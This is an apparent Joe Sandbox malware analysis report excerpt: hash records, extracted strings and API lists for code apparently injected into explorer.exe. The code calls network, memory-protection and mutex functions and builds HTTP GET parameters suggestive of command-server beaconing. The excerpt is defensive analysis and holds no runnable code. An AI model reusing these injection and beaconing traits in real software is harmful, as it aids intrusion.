                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a398be43700916db0f112ae4ba1dfb541cead549bbb8172eb9a7eecafb1d4e1
                                      • Instruction ID: 60883c3004d0fae9a59380b396efd10108f72a28f4dec87d159b673514c6a29c
                                      • Opcode Fuzzy Hash: 1a398be43700916db0f112ae4ba1dfb541cead549bbb8172eb9a7eecafb1d4e1
                                      • Instruction Fuzzy Hash: EB01F731708509EFCF14EB6EE8049AAF7F8FB85710F1840A9DA01D7280DE20DE09C652
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 79967b273ec546a972a70de6745dbae26f9241ef477e27104b15b8012b61f9a8
                                      • Instruction ID: e7d142d35fae7406e8f07e0f693cc588d618d03fd2575967159b311bcde86f6a
                                      • Opcode Fuzzy Hash: 79967b273ec546a972a70de6745dbae26f9241ef477e27104b15b8012b61f9a8
                                      • Instruction Fuzzy Hash: A2018471A01259EBDB10EBA9D849FAEBBF8EF54704F444066F901EB280D674DA01C794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                      • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                      • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                      • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ba87d531379b07c3be2adb6a05fc4010aec8639300aafcf1607da9f928c876f7
                                      • Instruction ID: a59e54f4d21637d958f4fddccd62625ce3cea1fede268603f77e429ae627646b
                                      • Opcode Fuzzy Hash: ba87d531379b07c3be2adb6a05fc4010aec8639300aafcf1607da9f928c876f7
                                      • Instruction Fuzzy Hash: 27116D74D00259EFCB00DFA9D548A9EB7F4FF18704F14805AA915EB390D774DA02CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7585305ec8944c1047caf7929bbf399e281213487378fe38eea26fd9739dbd67
                                      • Instruction ID: ff27f8f8ef523826b0c1efececb5740e0793b09ec3a4863957badcced88f284a
                                      • Opcode Fuzzy Hash: 7585305ec8944c1047caf7929bbf399e281213487378fe38eea26fd9739dbd67
                                      • Instruction Fuzzy Hash: DC110970A1124ADFDB04DFA9D545BADFBF4FF08704F1442AAE509EB782E634DA418B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a23a74abeef7df39ca4d0782f059420ad1b22dcd26f2a249a84cb06136c79114
                                      • Instruction ID: 1400afcc78875f8573029346f42bc8ffe2667794e3bc0e905c47805967603b8e
                                      • Opcode Fuzzy Hash: a23a74abeef7df39ca4d0782f059420ad1b22dcd26f2a249a84cb06136c79114
                                      • Instruction Fuzzy Hash: 23F04C332045239BDF3317D95845B27E9A99FD5A60F1500B5B60ABB244CA608C0592D4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1df7aaa6c4eb2d8f3ba083b50defc1120c9e8fe50cb66fae042dee7c61261d84
                                      • Instruction ID: 76a5c7d329421ded767f4cb96a28bf54cae873b0073d6c709470b62c98603fc3
                                      • Opcode Fuzzy Hash: 1df7aaa6c4eb2d8f3ba083b50defc1120c9e8fe50cb66fae042dee7c61261d84
                                      • Instruction Fuzzy Hash: 52F0C831A10258AFDB04DFB9D549AEEB7F9EF48714F00849AF901F7280DA74DA05C750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a5e8d8557c6a37e2241eaaa5ee4be38b15fbe971b01f53b27e1c72bad1f36329
                                      • Instruction ID: 2c24fa5d46b9a02085aeeae74e42fd74b7a6f597de5478b21925d5f70ca62c0b
                                      • Opcode Fuzzy Hash: a5e8d8557c6a37e2241eaaa5ee4be38b15fbe971b01f53b27e1c72bad1f36329
                                      • Instruction Fuzzy Hash: 3F012170E1020ADFDB44DFA9D545B9EFBF4FF08304F1481A5A509EB381DA34DA418BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 217818d241a1b56c394881ec454e7d42acfbfbbf914531f6e7a2b3257e3a21b2
                                      • Instruction ID: 6f66ce346781abc6614c5ae68b93de34922c1a219bc3ea7338308d593c9e12b1
                                      • Opcode Fuzzy Hash: 217818d241a1b56c394881ec454e7d42acfbfbbf914531f6e7a2b3257e3a21b2
                                      • Instruction Fuzzy Hash: FFF024326483415BFF2A961DAC05B33F38AF7C2710F24807AEB058B2D5EA71DC058354
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89e5f341a4d452e91db5142f13233f399dc7af0ba99f33442ef3dc3c8659c161
                                      • Instruction ID: b341d5de9e419ef18f681d090b866da47e6bd3277f578e42bacc96fb3f6584aa
                                      • Opcode Fuzzy Hash: 89e5f341a4d452e91db5142f13233f399dc7af0ba99f33442ef3dc3c8659c161
                                      • Instruction Fuzzy Hash: B3F0AF702053449FC710EF28C549A2ABBE4FF98704F80465AB898DB398E734EA00CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f0119d36c149d83571b3c8004ac03f87dae70fc8008033ebef1c388f7709d9b0
                                      • Instruction ID: ec82e5a2f76cb1b3807dc3c23a8a4651f11ad66896d4148e35b18c87a0bd47da
                                      • Opcode Fuzzy Hash: f0119d36c149d83571b3c8004ac03f87dae70fc8008033ebef1c388f7709d9b0
                                      • Instruction Fuzzy Hash: 69F03C70A01249EFCB44EFA9D549A9EBBF4EF18304F548069B905EB381D674DA40CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61fa29b25025ae118eca64f5589c1ea57ba1e78304182a2b8715fc988b92419b
                                      • Instruction ID: 7d0566f0779efd67df39112b0b1dbd2bf815a6943c4702f9d70ce29d41c9ff91
                                      • Opcode Fuzzy Hash: 61fa29b25025ae118eca64f5589c1ea57ba1e78304182a2b8715fc988b92419b
                                      • Instruction Fuzzy Hash: 5BF04974A10249EFDB00EFA9D559A9EBBF4FF18304F50846AB905EB381E674EB00CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4b3f1695b0f6026db0f8e7db37de3d6804453cc177eb98f65bdfaba14fc15c14
                                      • Instruction ID: 240ac38ccbf078748f5c328983077f879a326ca3261d31436159229269262d9b
                                      • Opcode Fuzzy Hash: 4b3f1695b0f6026db0f8e7db37de3d6804453cc177eb98f65bdfaba14fc15c14
                                      • Instruction Fuzzy Hash: 33F0F0321047006BEB319B48DC09F9BFBFDEF80704F08015DE642930A1D6A0A909C760
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9b339a81d23189abfe119e581ee8fb3ff6a36c31d07aafd2445a81c41f7dc636
                                      • Instruction ID: a6237db97506fa0ef0d824a5062ae64765a98eb74f95020404ae2c364a67e88c
                                      • Opcode Fuzzy Hash: 9b339a81d23189abfe119e581ee8fb3ff6a36c31d07aafd2445a81c41f7dc636
                                      • Instruction Fuzzy Hash: 3FF09070A10249EFDB04EFA9D549EAEBBF4FF18304F00446AAA01EB391E634DA00CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e78874bf520fe222bb7d54b418da7df1c96898a41e0560cae44803ed8fd049f5
                                      • Instruction ID: 3840e9bbaee6c873c98663b2e2cf4f53bf5e5ed623aad2f3da5d3eea1f4229b3
                                      • Opcode Fuzzy Hash: e78874bf520fe222bb7d54b418da7df1c96898a41e0560cae44803ed8fd049f5
                                      • Instruction Fuzzy Hash: 58E092723006012BE7129E598CC8F47ABEEDF96714F040979B5045F142CAE29C0986A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2cbdf20204f2e4bcbad41dba37bf405049cc05d03e712357e820d226b07da733
                                      • Instruction ID: 86316d6907a2b17531d64f892750d1476f141896dda649bf48d3f4cd2f799b6f
                                      • Opcode Fuzzy Hash: 2cbdf20204f2e4bcbad41dba37bf405049cc05d03e712357e820d226b07da733
                                      • Instruction Fuzzy Hash: 93F0ECB15126989BE727935CC088B62FBFC9B04660FB88169E507C7512CB60D880C240
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3957b1d4337d91246bc93c36a9c37be7487b3a2dff01d126adb9eeb01075e764
                                      • Instruction ID: 93687bade1a7ffe65de21b65bb54fba4ad2c79bc3e53c204fa0ad620e60919fb
                                      • Opcode Fuzzy Hash: 3957b1d4337d91246bc93c36a9c37be7487b3a2dff01d126adb9eeb01075e764
                                      • Instruction Fuzzy Hash: AAF05E70A10249EFDB04EBB9D549EAEBBF4AF18704F508499E902EB285DA34DA018B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89e218a911f868c9fb0b799bc47213e5fc10e81e81f94c3a717855b24a60f96d
                                      • Instruction ID: e261d95417a7b26142ca8a8b4860d088b646fc2456de8903abb7dd5d104d3f0a
                                      • Opcode Fuzzy Hash: 89e218a911f868c9fb0b799bc47213e5fc10e81e81f94c3a717855b24a60f96d
                                      • Instruction Fuzzy Hash: A6F08270A04249ABDB04EBA9E959F9EB7F4AF08704F540099AA01EB2C4DA34DA008724
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6edfa7c3116d9af43a415dcc79f7f5feb73d8e17160ede48053d79c4ce1f15db
                                      • Instruction ID: 8bc2a6167abc9ce3ae1a5d294717bd5932a9a28da8778d783a745fe3418c45e8
                                      • Opcode Fuzzy Hash: 6edfa7c3116d9af43a415dcc79f7f5feb73d8e17160ede48053d79c4ce1f15db
                                      • Instruction Fuzzy Hash: 91F0A033A966A49FD732D7ECD0C4F22BBEC9B44775F098161E809C7506C364DE80C255
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b5bff7aa1338c30e73f9c8df84d2b6a87e241d096f6fc70a233da8821a153d57
                                      • Instruction ID: 7c1039030f3b0c7f58d1827198d9abdd35da433f6a6a152997a54a4c40ac03cd
                                      • Opcode Fuzzy Hash: b5bff7aa1338c30e73f9c8df84d2b6a87e241d096f6fc70a233da8821a153d57
                                      • Instruction Fuzzy Hash: 90E092331006419BC722BB18DC19F8BB7DAEFA0361F144614B166571A5CB70A910CBC4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 0181453B
                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 0181466D
                                      • Execute=1, xrefs: 018145F9
                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018145E2
                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 0181460B
                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814628
                                      • ExecuteOptions, xrefs: 01814586
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                      • API String ID: 0-484625025
                                      • Opcode ID: 0fc96bcf947057367803e73ba3512e785fb673a74fbf72ee69960b2e65071acb
                                      • Instruction ID: 7cea9ce0264be7f6113b213a91f4432164cde6b25b372906dd2b778c6d3fa9fd
                                      • Opcode Fuzzy Hash: 0fc96bcf947057367803e73ba3512e785fb673a74fbf72ee69960b2e65071acb
                                      • Instruction Fuzzy Hash: 5E51297160021DBAEF25AE99DC99FA9B7B8EF18308F1404D9E605A7181F7709F418F60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $$@
                                      • API String ID: 0-1194432280
                                      • Opcode ID: 677f35043afc142550a6c88f7f5273bfb610fdc12639c31d1a063ab33d10b658
                                      • Instruction ID: c574b39fcb8de2bd573856c55dad47ea08e8da5082bfe0011722d2fe95432f0d
                                      • Opcode Fuzzy Hash: 677f35043afc142550a6c88f7f5273bfb610fdc12639c31d1a063ab33d10b658
                                      • Instruction Fuzzy Hash: 28812C71D002699BDB76CB54CC49BEEB7B4AF48714F0445DAEA19B7280D7709E84CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:2.3%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:4.7%
                                      Total number of Nodes:444
                                      Total number of Limit Nodes:16
13835->13836 13836->13833 13838 888c8f2 NtProtectVirtualMemory 13836->13838 13838->13833

                                      Control-flow Graph

                                      [Graph residue: control-flow graph of function 8897f82 (basic blocks 8897f82-8898920); API calls getaddrinfo, setsockopt, recv; internal calls into 88945b2, 8894732 and 88946b2 among others]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: getaddrinforecvsetsockopt
                                      • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                      • API String ID: 1564272048-1117930895
                                      • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                      • Instruction ID: ec1ebce711df56b22caee28ff812cf885390c2d53841ad84ef169a07515f314e
                                      • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                      • Instruction Fuzzy Hash: 0B52A130614A098FCB29EF68C8847E9B7E1FB55301F58466ED4EFD7642DE30A54ACB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Graph residue: control-flow graph of function 8897232 (basic blocks 8897232-88978cd); API call NtCreateFile; internal calls into 8897942, 8897172 and 8898e92]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: `
                                      • API String ID: 823142352-2679148245
                                      • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                      • Instruction ID: c54f102c91bfaf9c581e02c4116dfe446cedee36622557e694748ff97e076134
                                      • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                      • Instruction Fuzzy Hash: 82227D70A28A099FCB59EF68C4856AEF7E1FB98305F44422EE49ED3650DB30E451CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Graph residue: control-flow graph of function 8898e12 (basic blocks 8898e12-8898e8f); API call NtProtectVirtualMemory; internal call into 8897942]
                                      APIs
                                      • NtProtectVirtualMemory.NTDLL ref: 08898E67
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 2706961497-0
                                      • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                      • Instruction ID: 49415fb8e3e8b895ddebc34f6f7b0a337b5d0119fd93aaf90b2e07ee61714ad9
                                      • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                      • Instruction Fuzzy Hash: 69015E34668B484F9B88EF6C948512AB7E4FBDA315F000B3EA99AC7254EB64D5414742
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Graph residue: control-flow graph of function 8898e0a (basic blocks 8898e0a-8898e8f); API call NtProtectVirtualMemory; internal call into 8897942]
                                      APIs
                                      • NtProtectVirtualMemory.NTDLL ref: 08898E67
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID:
                                      • API String ID: 2706961497-0
                                      • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                      • Instruction ID: 576049087e5a5be36991b722c006bb04f43bea874b1f450dfba8c14348b0177d
                                      • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                      • Instruction Fuzzy Hash: 3201A234628B884F8B48EF2C94512A6B3E5FBCE315F000B3EE9DAC3240DB25D5024782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • ObtainUserAgentString.URLMON ref: 088929A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: AgentObtainStringUser
                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                      • API String ID: 2681117516-319646191
                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                      • Instruction ID: caa9491b926a472078a0eb843618cf2a5857b0acbf5b99c91f730755c35a09df
                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                      • Instruction Fuzzy Hash: 99319F31614A0D8ACF45EFA8C8847EDBBE1FB58215F44426AE49ED7240DE788645C78A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • ObtainUserAgentString.URLMON ref: 088929A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: AgentObtainStringUser
                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                      • API String ID: 2681117516-319646191
                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                      • Instruction ID: 2e37c95adb2843d9fa022bbd315db5ff8501ce6d2756192bc333104d5bfe6d50
                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                      • Instruction Fuzzy Hash: 6D21C130610A0C8ECF05EFA8C8947EDBBA0FF58205F44426EE49AD7340DF748605C78A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Graph residue: control-flow graph of function 888eb66 (basic blocks 888eb66-888ecf6); API call CreateMutexW; internal calls into 8895612, 8897942, 8899da4, 8899022 and 88993e2]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID: .dll$el32$kern
                                      • API String ID: 1964310414-1222553051
                                      • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                      • Instruction ID: ca9d3b4d5d21637589b88c69602fa97db6042c54bdd876642e9a1273c73aae7c
                                      • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                      • Instruction Fuzzy Hash: B0414C74928A08CFDB54EFA8C8947AD77E1FB58301F04427AC84EDB255DA349945CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID: .dll$el32$kern
                                      • API String ID: 1964310414-1222553051
                                      • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                      • Instruction ID: 0f952b7cbc5d1c78e498555f817bd112085f7eda63fbf4b9eec0d1246131ea52
                                      • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                      • Instruction Fuzzy Hash: 50412C74A28A088FDF54EFA8C894BAD77E1FB58301F04417AC84EDB256DE349945CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      [Graph residue: control-flow graph of function 889472e (basic blocks 889472e-88947ab); API call connect; internal call into 8897942]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.2509035504.0000000008850000.00000040.80000000.00040000.00000000.sdmp, Offset: 08850000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_8850000_explorer.jbxd
                                      Similarity
                                      • API ID: connect
                                      • String ID: conn$ect
                                      • API String ID: 1959786783-716201944
                                      • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                      • Instruction ID: cebe7768d91000cfc1c2eac395d9e014f1e084062a4d39edad683a450f8c43b6
                                      • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
